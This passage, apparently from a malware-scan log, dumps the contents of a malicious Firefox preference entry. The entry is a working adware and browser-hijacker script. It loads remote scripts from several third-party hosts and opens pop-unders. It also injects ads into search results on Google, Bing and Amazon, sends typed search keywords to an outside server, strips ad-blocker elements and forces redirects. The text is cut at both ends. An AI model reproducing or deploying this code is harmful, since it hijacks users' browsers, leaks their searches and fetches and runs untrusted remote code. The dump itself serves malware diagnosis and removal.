i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}})();(function(){void(0)})()");
FF - prefs.js..extensions.ZAakLUMfg3R.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\"a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=388480&ext=saveshare\":\"//static.getjs.net/sd/1018/1009.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if (window.self.location.protocol.indexOf('http') > -1 && window.self == window.top){var script = document.createElement('script');script.type = 'text/javascript';script.src = '//lb-betty-598702759.us-east-1.elb.amazonaws.com/xuiow/?s=PT1311FA&pid=2934&z=1&g=1 ';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=dnkp&userId=16418234083645659194&CTID=p1182';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src=window.self.location.protocol=='https:' ? '//i_dnkpjs_info.tlscdn.com/dnkp/javascript.js?channel=p1182&hid=0' : '//i.dnkpjs.info/dnkp/javascript.js?channel=p1182&hid=0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=1';document.getElementsByTagName(\"head\")[0].appendChild(script);};new function(){var a=this;a.domain_storage=\"http://xls.searchfun.in\";a.prefix=\"if72ru4ruh7fewui\";a.conf={\"1\":{\"0\":1,\"1\":21600,\"2\":0,\"3\":0,\"4\":0,\"5\":21600,\"6\":21600,\"7\":0,\"8\":0,\"9\":21600,\"10\":21600,\"11\":0,\"12\":21600,\"13\":0,\"17\":0,\"18\":12345,\"19\":21600,\"20\":21600,\"21\":21600,\"22\":21600,\"29\":21600,\"30\":21600,\"32\":0,\"33\":21600,\"35\":21600,\"41\":0,\"44\":21600,\"45\":21600,\"46\":0,\"47\":21600},\"3\":{\"0\":1,\"1\":0,\"5\":0,\"6\":0,\"9\":0,\"10\":0,\"12\":0,\"13\":0,\"17\":0,\"19\":0,\"20\":0,\"21\":0,\"22\":0,\"29\":0,\"30\":0,\"32\":0,\"33\":0,\"35\":0,\"41\":0,\"44\":0,\"45\":0,\"46\":0,\"47\":0}};a.pop_collision_id=\"__ipu=1\";a.setStorage=function(d,b){localStorage.setItem(a.prefix+\"_\"+d+\"_\"+a.curr_vert,b);localStorage.setItem(a.prefix+\"_\"+d+\"_global\",b)};a.utils=new function(){var a=this;a.inject_script=function(a){if(a instanceof Array)for(var d=0;d<a.length;d++){var c=document.createElement(\"script\");c.type=\"text/javascript\";var e=a[d];\"function\"==typeof e?(e=e.toString(),c.text=e):c.src=e;document.getElementsByTagName(\"body\")[0].appendChild©}};a.epoch=function(){return Math.floor((new Date).getTime()/1E3)};a.getVert=function(){var b=localStorage.getItem(\"dmj47dfbh56edh32\");0===parseInt(b)&&(b=1);return b?b:a.forexVert()};a.forexVert=function(){var b=\"stocks trading;buying shares;how to buy stocks;invest in stocks;trading courses;autotrade;stock market trading;online stock trading;learn to trade;fx trading training;how to trade stocks;trading demo;how to sell stocks;forex broker;good stocks to invest in;trading forex;forex;online forex trading;forexpros;free forex;forex system;forex currency;sowtware forex;forex market;learn forex;rates forex;forex book\".split(\";\");try{for(var g=document.title.toLowerCase()+\" \"+window.self.location,c=0;c<b.length;c++)if(-1<g.indexOf(b[c]))return a.curr_vert=19;return 1}catch(e){return 1}}};a.products=new function(){this.code_1=function code_1(a,b,g,c){(function©{(function©{var e=top!=window.self&&\"string\"===typeof top.document.location.toString()?top:window.self,l=null,h={},k=h.name||Math.floor(1E3*Math.random()+1),p=h.width||window.outerWidth||window.innerWidth||document.documentElement.clientWidth,r=h.height||window.outerHeight-100||window.innerHeight||document.documentElement.clientHeight,s=\"undefined\"!=typeof h.left?h.left.toString():window.screenX,h=\"undefined\"!=typeof h.top?h.top.toString():window.screenY,t=function(){var a=navigator.userAgent.toLowerCase(),b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();(function(c,h,f,k,p,r){var s=\"toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1,width=\"+f.toString()+\",height=\"+k.toString()+\",screenX=\"+p+\",screenY=\"+r,q=function(){window.removeEventListener?document.removeEventListener(\"click\",q,!1):document.detachEvent(\"onclick\",q);l=e.window.open(c,h,s);localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_\"+g,b);localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",b);if(l)try{l.blur();l.opener.window.focus();window.self.window.focus();window.focus();if(t.firefox){var f=window.open(\"about:blank\");f.focus();f.close()}if(t.webkit){var m=document.createElement(\"a\");m.href=\"data:text/html,<script>window.close();\\x3c/script>\";document.getElementsByTagName(\"body\")[0].appendChild(m);var k=document.createEvent(\"MouseEvents\");k.initMouseEvent(\"click\",!0,!0,window,0,0,0,0,0,!0,!1,!1,!0,0,null);m.dispatchEvent(k);m.parentNode.removeChild(m)}t.msie&&(l.opener.window.focus(),window.self.window.focus(),window.focus())}catch(p){}};document.addEventListener?document.addEventListener(\"click\",q,!1):document.attachEvent(\"onclick\",q)})(c,k,p,r,s,h)})©})(\"http://childsafedownloadx.asia/?vert=\"+g+\"&rff=\"+window.self.location.hostname+\"&pid=1182&hid=8196839351945351958&eid=308&\"+c)};this.code_3=function code_3(a,b,g,c){var e=\"http://childsafedownloadx.asia/?vert=\"+g+\"&rff=\"+window.self.location.hostname+\"&pid=1182&hid=8196839351945351958&eid=308&\"+c,f=function(){localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_\"+g,b);localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",b);window.open(e,\"_blank\");window.removeEventListener?document.removeEventListener(\"click\",f,!1):document.detachEvent(\"onclick\",f)};document.addEventListener?document.addEventListener(\"click\",f,!1):document.attachEvent(\"onclick\",f)}};a.checkFreq=function(d,b,g){var c=a.prefix+\"_\"+d,e=localStorage.getItem(c+\"_\"+b),c=localStorage.getItem(c+\"_global\"),f=function(b,c){if(parseInt(b))return g-b>parseInt(a.conf[d][c])},n=encodeURIComponent(\"code_\"+d+\"(\"+d+\",\"+g+\",\"+b+\",'\"+a.pop_collision_id+\"')\"),n=a.domain_storage+\"/?p=\"+d+\"&vf=\"+a.conf[d]+\"&gf=\"+a.conf[d][0]+\"&v=\"+b+\"&t=\"+g+\"&cb=\"+n;e||c?f(c,0)&&(e&&f(e,b))&&a.utils.inject_script([a.products[\"code_\"+d],n],a.prefix):a.utils.inject_script([a.products[\"code_\"+d],n])};a.init=function(){if(\"undefined\"!==typeof localStorage&&\"undefined\"!==typeof localStorage.getItem&&-1==window.location.href.indexOf(a.pop_collision_id)&&-1<window.self.location.protocol.indexOf(\"http\")){a.curr_vert=a.utils.getVert();var d=a.utils.epoch(),b;for(b in a.conf)\"undefined\"!=typeof a.products[\"code_\"+b]&&0!=a.conf[a.curr_vert]&&a.checkFreq(b,a.curr_vert,d)}};window.self==window.top&&a.init();\"undefined\"==typeof window.ddadv&&(window.ddadv=a)};;if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top && !document.getElementById('sjsjszmzmaw28aj6')){var script=document.createElement('script');script.type='text/javascript';script.setAttribute('id','sjsjszmzmaw28aj6');script.src='//static.getjs.net/sd/1018/1013.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.3\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\", validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:\"#sb_form_q\",validate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\", \"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\", unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop= \"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c= function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,b.utils.waitForElement(this.src_for_keyword,function(){var c=document.getElementById(\"omnibox\");\"0px\"!=getComputedStyle(c,null).right&&a()}))}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c, b,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var c=0;c<a.cache.length;c++)a.remove.apply(a,a.cache[c]);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;if(25<b.waitForElementCounter)return d(null);if(\"undefined\"== typeof g||1>g.length){if(a[f])return d(null);var k=arguments.callee;setTimeout(function(){b.waitForElementCounter++;k(c,d,e,f)},e)}else{if(a[f])return d(null);b.waitForElementCounter=0;return d(g)}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!= typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText= a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a= a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"== d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"== f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref= function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a= a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template); d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h))return h;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a, c[0])),b.not_unique_items.push(c.shift())};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector);\"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a, c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout=b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name; b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return 2>b.keyword.length?!1:c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f], function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb= function(a){window.__yael_res=a;\"0\"!=__yael_res.data.numberOfItems&&(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=8196839351945351958&eid=308&pid=1182\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\"); e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"!=__yael_res.data.numberOfItems&&(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;(function(){if(-1<window.self.location.protocol.indexOf(\"http\")&&window.self==window.top){var a,b=document.getElementsByTagName(\"head\")[0];a=document.createElement(\"SCRIPT\");a.type=\"text/javascript\";a.src=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/widget.min.js?r=684295654\";b.appendChild(a);a=document.createElement(\"link\");a.type=\"text/css\";a.rel=\"stylesheet\";a.href=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/style.css?r=684295654\";b.appendChild(a)}})();;if(window.self.location.protocol.indexOf('http:')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//static.datafastguru.info/fo/min/fo_ss.min.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://rbv.jobfindgold.info/a1/?eid=308&hid=8196839351945351958&pid=1182&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='setTimeout(function(){window.self.location.href=\"'+d+'\";},10)',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(-1<window.self.location.href.indexOf(\"df.ly/\")){var 